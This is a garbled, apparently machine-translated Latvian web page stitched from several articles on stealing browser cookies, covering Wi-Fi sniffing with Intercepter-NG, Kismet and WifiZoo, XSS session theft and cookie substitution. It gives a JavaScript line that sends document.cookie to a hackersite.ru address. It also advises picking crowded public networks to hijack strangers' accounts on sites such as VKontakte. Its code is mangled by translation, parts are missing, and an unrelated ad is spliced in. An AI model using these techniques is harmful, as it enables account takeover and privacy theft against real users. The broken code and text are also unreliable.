Vietnes sadaļas
Redaktora izvēle:
- Kas ir MTS trasta maksājums?
- Aeroflot Bonusa programma: kā uzkrāt jūdzes un kam tās tērēt?
- Kā uzzināt, kurš disks ir jūsu datorā: SSD vai HDD Kā uzzināt, kurš ssd ir jūsu datorā
- Fractal Design Define R5 testēšana Fractal Design Define R5 — kluss, plašs
- Kā paātrināt Android viedtālruni un planšetdatoru?
- Plūdu kontrole VKontakte: mēs jums pastāstīsim, kāpēc rodas problēma un kā to var novērst. Tātad plūdu kontrole
- Lādētājs, kura pamatā ir ATX barošanas avots Laboratorijas barošanas avots, kura pamatā ir 3528 PWM kontrolieris
- Ko darīt, ja vads neuzlādē jūsu iPhone
- Virtuālā mašīna operētājsistēmai Mac Virtuālie logi operētājsistēmā Mac OS
- Par Tele2 pakalpojumu Kā ievadīt maksājuma apstiprinājumu uz numuru 312
Reklāma
Kā pārtvert sīkfailus. Vienkāršs veids, kā nozagt cepumus |
Par atvērto Wifi piekļuves punktu briesmām, paroļu pārtveršanu. Šodien mēs apskatīsim paroļu pārtveršanu, izmantojot Wi-Fi, un sīkfailu pārtveršanu, izmantojot programmu Wi-Fi. Uzbrukums notiks sakarā ar Sniffing.
Sniffing— sniff tulkojumā nozīmē “šņaukt”. Sniffing ļauj analizēt tīkla darbību internetā, skatīt, kuras vietnes lietotājs apmeklē, un pārtvert paroles. Bet to var izmantot arī lietderīgiem nolūkiem, lai klausītos vīrusus, kas sūta jebkādus datus uz internetu.
apkalpošana avi1 piedāvā elpu aizraujoši lētas cenas par iespēju pasūtīt abonentus savam Instagram profilam. Palieliniet tiešsaistes popularitāti vai pārdošanu tieši tagad, netērējot daudz pūļu un laika. Darbs ar programmu Intercepter NG Tātad programma tiek palaista, izmantojot Intercepter-NG.exe. Zemāk būs video par iestatīšanu (tiem, kas dod priekšroku skatīties, nevis lasīt). — Nospiediet pogu Skenēšanas režīms(radara ikona)
Tas arī viss. Mēs apskatījām paroļu pārtveršanu, izmantojot Wi-Fi, un sīkfailu pārtveršanu, izmantojot Wi-Fi. parūpējies par sevi Sīkdatnes - informācija teksta faila veidā, ko tīmekļa vietne saglabā lietotāja datorā. Satur autentifikācijas datus (pieteikšanās/parole, ID, tālruņa numurs, adrese pastkaste), lietotāja iestatījumi, piekļuves statuss. Saglabāts pārlūkprogrammas profilā. Sīkdatņu uzlaušana ir tīmekļa resursa apmeklētāja sesijas zādzība (vai “nolaupīšana”). Privāta informācija kļūst pieejama ne tikai sūtītājam un saņēmējam, bet arī trešajai pusei - personai, kas veica pārtveršanu. Sīkfailu uzlaušanas rīki un paņēmieniDatoru zagļiem, tāpat kā viņu kolēģiem dzīvē, bez prasmēm, veiklības un zināšanām, protams, ir arī savi instrumenti - sava veida galveno atslēgu un zondu arsenāls. Apskatīsim populārākos trikus, ko hakeri izmanto, lai no interneta lietotājiem iegūtu sīkfailus. SniffersĪpašas programmas izsekošanai un analīzei tīkla trafiku. Viņu nosaukums cēlies no angļu valodas darbības vārda “sniff” (sniff), jo. burtiski “izšņaukt” pārsūtītās paketes starp mezgliem. Taču uzbrucēji izmanto sniffer, lai pārtvertu sesijas datus, ziņojumus un citus datus konfidenciāla informācija. Viņu uzbrukumu mērķi galvenokārt ir neaizsargāti tīkli, kur sīkfaili tiek nosūtīti atvērtā HTTP sesijā, tas ir, tie praktiski nav šifrēti. (Šajā ziņā visneaizsargātākais ir publiskais Wi-Fi.) Lai iegultu sniffer interneta kanālā starp lietotāja mezglu un tīmekļa serveri, tiek izmantotas šādas metodes:
Saīsinājums XSS apzīmē Cross Site Skriptēšana — starpvietņu skriptēšana. Izmanto, lai uzbruktu vietnēm, lai nozagtu lietotāja datus. XSS princips ir šāds:
Lai “implantētu” programmatūras XSS mehānismu, hakeri izmanto visu veidu ievainojamības tīmekļa serveros, tiešsaistes pakalpojumos un pārlūkprogrammās. Visas XSS ievainojamības ir sadalītas divos veidos:
Hakeri rūpīgi “maskē” savus XSS skriptus, lai upuris neko nenojauš. Viņi maina faila paplašinājumu, nodod kodu kā attēlu, motivē sekot saitei un piesaista viņus ar interesantu saturu. Rezultātā: PC lietotājs, nespējot kontrolēt savu zinātkāri, ar savu roku (ar peles klikšķi) nosūta sesijas sīkfailus (ar pieteikumvārdu un paroli!) XSS skripta autoram - datora nelietim. Sīkdatņu aizstāšanaVisas sīkdatnes tiek saglabātas un nosūtītas uz tīmekļa serveri (no kuras tās "nāca") bez izmaiņām - to sākotnējā formā - ar tām pašām vērtībām, virknēm un citiem datiem. To parametru apzinātu pārveidošanu sauc par sīkfailu aizstāšanu. Citiem vārdiem sakot, nomainot sīkfailus, uzbrucējs izliekas par vēlmju domāšanu. Piemēram, veicot maksājumu interneta veikalā, sīkfails maina maksājuma summu uz leju – tādējādi notiek pirkumu “taupīšana”. Nozagti sesijas sīkfaili sociālajā tīklā no kāda cita konta tiek “ievietoti” citā sesijā un citā datorā. Nozagto sīkfailu īpašnieks saņem pilnu piekļuvi upura kontam (korespondencei, saturam, lapas iestatījumiem), kamēr viņa atrodas savā lapā. Sīkdatņu “rediģēšana” tiek veikta, izmantojot:
Fiziskā piekļuve datiemĻoti vienkārša ķēdeīstenošana sastāv no vairākiem posmiem. Bet tas ir efektīvs tikai tad, ja cietušā dators ar atvērtu sesiju, piemēram, VKontakte, tiek atstāts bez uzraudzības (un ilgu laiku!):
Parasti hakeri izmanto iepriekš minētos rīkus (+ citus) gan kombinācijā (jo aizsardzības līmenis daudzos tīmekļa resursos ir diezgan augsts), gan atsevišķi (kad lietotāji ir pārmērīgi naivi). XSS + sniffer
Sīkdatņu aizsardzība pret uzlaušanu
Un pats galvenais, nezaudē modrību un uzmanību, atpūšoties vai strādājot internetā! Kas ir cepums? Ir mehānisms, kas ļauj http serverim saglabāt dažus teksta informācija, un pēc tam sazinieties ar viņu. Šī informācija sauc par cepumu. Būtībā katrs sīkfails ir pāris: parametra nosaukums un tā vērtība. Katram sīkfailam tiek piešķirts arī domēns, kuram tas pieder. Drošības apsvērumu dēļ visās pārlūkprogrammās http serverim ir atļauts piekļūt tikai sava domēna sīkfailam. Turklāt sīkfailiem var būt derīguma termiņš, un tādā gadījumā tie tiks saglabāti datorā līdz šim datumam, pat ja aizverat visus pārlūkprogrammas logus. Kāpēc sīkfaili ir svarīgi? Visas vairāku lietotāju sistēmas izmanto sīkfailus, lai identificētu lietotāju. Vai drīzāk, pašreizējais savienojums lietotājs ar pakalpojumu, lietotāja sesija. Ja kāds atpazīs jūsu sīkfailus, viņš varēs pieteikties sistēmā jūsu vārdā. Tā kā iekšā pašlaikļoti maz interneta resursu pārbauda IP adreses izmaiņas vienas lietotāja sesijas laikā. Kā nomainīt vai aizstāt sīkfailus? Pārlūkprogrammu izstrādātāji nenodrošina iebūvētus rīkus sīkfailu rediģēšanai. Bet jūs varat iztikt ar parasto piezīmju grāmatiņu. 1. darbība: izveidojiet teksta fails ar tekstu Windows reģistra redaktora versija 5.00 Saglabājiet to ar nosaukumu IE_ext.reg 2. darbība. Izmantojot izveidoto failu, pievienojiet izmaiņas Windows reģistrā. 3. darbība: izveidojiet teksta failu ar tekstu <
script
valoda = "javascript"> script > Saglabājiet to ar nosaukumu C:\IE_ext.htm 4. darbība: dodamies uz mūs interesējošo vietni. 5. darbība: ar peles labo pogu noklikšķiniet uz tukšas vietas lapā un atlasiet izvēlnes vienumu "Darbs ar sīkfailiem". Atļaujiet piekļuvi starpliktuvei. Jūsu sīkfaili no šīs vietnes tiks novirzīti starpliktuvē. Varat ievietot viņu piezīmju grāmatiņu un apskatīt. 6. darbība. Lai mainītu dažus sīkfailus, rediģējiet failu C:\IE_ext.htm, aizstājot to testa nosaukums cepuma vārdā, testa vērtība- par tā nozīmi, testdomain.ru– uz vietnes domēnu. Ja nepieciešams, pievienojiet vairāk līdzīgu rindu. Lai atvieglotu kontroli, es skriptam pievienoju pašreizējo sīkfailu izvadi pirms un pēc izmaiņām: alert(external.menuArguments.document.cookie); 7. darbība: vēlreiz veiciet 5. darbību un pēc tam atsvaidziniet lapu. Apakšējā rinda: mēs piekļūsim šim interneta resursam ar atjauninātiem sīkfailiem. Kā nozagt sīkfailus, izmantojot JavaScript? Ja uzbrucējam izdodas atrast iespēju upura datorā izpildīt patvaļīgu JavaScript skriptu, viņš var ļoti viegli nolasīt pašreizējos sīkfailus. Piemērs: var str= document.cookie; Bet vai viņš tos varēs pārsūtīt uz savu vietni, jo, kā jau norādīju iepriekš, JavaScript skripts nevarēs piekļūt vietnei, kas atrodas citā domēnā bez papildu apstiprinājuma? Izrādās, ka JavaScript skripts var ielādēt jebkuru attēlu, kas atrodas jebkurā http serverī. Vienlaikus pārsūtiet uz šo attēlu visu lejupielādes pieprasījuma teksta informāciju. Piemērs: http://hackersite.ru/xss.jpg?text_info Tātad, ja palaižat šo kodu: var img= jauns attēls(); img.src= "http://hackersite.ru/xss.jpg?"+ kodētURI(dokuments.sīkdatne); tad sīkfails nonāks pieprasījumā lejupielādēt “attēlu” un “nonāks” uzbrucējam. Kā rīkoties ar šādiem pieprasījumiem lejupielādēt “attēlu”? Uzbrucējam tikai jāatrod mitināšana ar PHP atbalstu un jāievieto šāds kods:
Pēc tam visi šī skripta pieprasījuma parametri tiks saglabāti failā log.txt. Atliek tikai aizstāt iepriekš aprakstīto JavaScript skriptu http://hackersite.ru/xss.jpg uz ceļu uz šo php skriptu. Apakšējā līnija Es parādīju tikai vienkāršāko veidu, kā izmantot XSS ievainojamības. Taču tas pierāda, ka vismaz vienas šādas ievainojamības klātbūtne vairāku lietotāju interneta vietnē var ļaut uzbrucējam izmantot savus resursus jūsu vārdā. Vai esat ievērojuši, ka, atgriežoties vietnē, kuru jau esat apmeklējis, vietne jūs atpazīst un tiek atvērta ar iestatījumiem, kurus lietojāt iepriekšējā reizē? Jā, un diezgan bieži? Tas notiek, pateicoties sīkfailiem, kas glabā informāciju par apmeklētājiem, piemēram, pieteikumvārdu, paroli, sesijas ID un citus mainīgos lielumus, kas nepieciešami, lai identificētu apmeklētāju un parādītu lapas saturu atbilstoši lietotāja vēlmēm, kas izvēlētas pēdējā resursa apmeklējuma laikā. Programma WebCookiesSniffer parādīs lietotājam sīkfailus un to saturu vietnēs, kuras lietotājs skatās pārlūkprogrammā. Skatīt sīkfailusJūs atverat vietni, un WebCookiesSniffer tver cepumi s reālajā laikā. Lietderība pievieno visus noķertos sīkfailus tabulai, kurā tiek glabāti dati par resursdatoru, pieprasījuma ceļu, sīkfaila kopējo garumu, sīkfaila mainīgo skaitu un pašu sīkfailu ar mainīgo un vērtību nosaukumiem. WebCookiesSniffer var saglabāt apkopoto informāciju par sīkfailiem teksta failā. Programmai ir arī iespēja ģenerēt HTML pārskatu par visiem vai atlasītajiem sīkfailiem. Lai programma darbotos, jāinstalē WinPcap draiveris (kas atrodas arhīvā kopā ar WebCookiesSniffer). Lai mainītu WebCookiesSniffer programmas valodu uz krievu valodu, kopējiet failu WebCookiesSniffer_lng.ini (iekļauts arī arhīvā) direktorijā ar utilītu. Programmas WebCookiesSniffer ekrānuzņēmumi
Sveiki, šis īsais raksts, diezgan pat Īss apraksts Es vēlētos veltīt sevi vienkāršs veids pārtveršana cepumi V wi-fi tīkli. Es šeit nestāstīšu, kas ir cepumi un kāpēc tie ir nepieciešami, ja cilvēks ir ieinteresēts pārtvert “maizes izstrādājumus”; bezvadu tīklā, manuprāt, viņam vajadzētu zināt, kas tas ir un kāpēc viņam tas ir vajadzīgs. Es teikšu tikai vienu: izmantojot šos failus, jūs varat piekļūt citu cilvēku kontiem dažādās vietnēs, kurās lietotājiem ir jāveic autentifikācijas process (piemēram, mail.ru, vkontakte.ru utt.). Tātad sāksim. Vispirms mums jāatrod bezvadu tīkls, ar atvērtu interneta piekļuves vārteju, un vēlams, lai šim tīklam būtu diezgan daudz klientu. Piemēram, ir piemērots jebkurš tīkls lielos iepirkšanās centros, lidostās, dažādās kafejnīcās, kurās cilvēki parasti izmanto Wi-Fi piekļuve internetā, pasta lasīšanai, kontu pārbaudei dažādos iepazīšanās portālos, LJ un dažādu forumu apskatei. Tas viss ir tieši tas, kas mums vajadzīgs. Pieņemot lēmumu par tīkla atrašanās vietas izvēli, izpētot noteiktas maksimālā klientu skaita stundas, pāriesim tieši uz kaujas operācijām. Lai to izdarītu, mums ir nepieciešams klēpjdators ar Wi-Fi adapteri un noteiktu programmu komplektu. Manā gadījumā es izmantoju Acer klēpjdators Instalēta Aspire 3610, D-Link DWL G650 klienta wi-fi karte un BackTrack3 OS. Es iesaku jums izmantot šo OS, jo tajā jau ir iekļauts viss programmu komplekts, kas jums var būt nepieciešams, un vissvarīgākā priekšrocība ir tā, ka jums nav jāinstalē Backtrack savā ierīcē. HDD, varat palaist šo OS tieši no kompaktdiska vai zibatmiņas diska. Tagad pāriesim pie nepieciešamās programmatūras. Es izmantoju kismet tīkla atklāšanai un WifiZoo, lai pārtvertu sīkfailus. Es sīkāk pakavēšos pie otrās programmas. WifiZoo ir pasīvs gaisa viļņu skeneris un savāc diezgan daudz noderīga informācija, piemēram: pop3, smtp trafiks, http cookies/authinfo, msn, ftp akreditācijas dati, telnet tīkla trafiks, nbt utt. Vienīgais šīs programmas trūkums ir kanālu lēciena režīma trūkums, WifiZoo vienkārši klausās bezvadu interfeiss, un nevar, tā teikt, pārlēkt no kanāla uz kanālu. Bet šo trūkumu kompensē cita programma Kismet, kas atbalsta šo režīmu. Lai palaistu WifiZoo, jums būs nepieciešams:
Palaidīsim programmu, vispirms palaidīsim Kismet, lai atbalstītu kanālu pārlēcienu režīmu, pēc tam palaidīsim tieši WifiZoo. Jūsu priekšā vajadzētu parādīties šim logam: Tagad atliek tikai sēdēt un gaidīt, kamēr kaut ko pārtver visu, ko programma pārtver, var atrast žurnālos, kas atrodas direktorijā ar programmu /logs/. Varat arī palaist GUI saskarni, kas automātiski izveido savienojumu ar http 127.0.0.1:8000 Es nerakstīšu par visām šīs brīnišķīgās programmas funkcijām, es domāju, ka jūs pats izdomāsit pārējās iespējas, un kopš tā laika Šis brīdis Mūs interesē tikai sīkdatnes. Noklikšķiniet uz saites, kas saka sīkfailus, un skatiet, ko mēs pārtvērām: |
Populārs:
Jauns
- Aeroflot Bonusa programma: kā uzkrāt jūdzes un kam tās tērēt?
- Kā uzzināt, kurš disks ir jūsu datorā: SSD vai HDD Kā uzzināt, kurš ssd ir jūsu datorā
- Fractal Design Define R5 testēšana Fractal Design Define R5 — kluss, plašs
- Kā paātrināt Android viedtālruni un planšetdatoru?
- Plūdu kontrole VKontakte: mēs jums pastāstīsim, kāpēc rodas problēma un kā to var novērst. Tātad plūdu kontrole
- Lādētājs, kura pamatā ir ATX barošanas avots Laboratorijas barošanas avots, kura pamatā ir 3528 PWM kontrolieris
- Ko darīt, ja vads neuzlādē jūsu iPhone
- Virtuālā mašīna operētājsistēmai Mac Virtuālie logi operētājsistēmā Mac OS
- Par Tele2 pakalpojumu Kā ievadīt maksājuma apstiprinājumu uz numuru 312
- Darbs ar iekšējo atmiņu EEPROM Eeprom dzēšana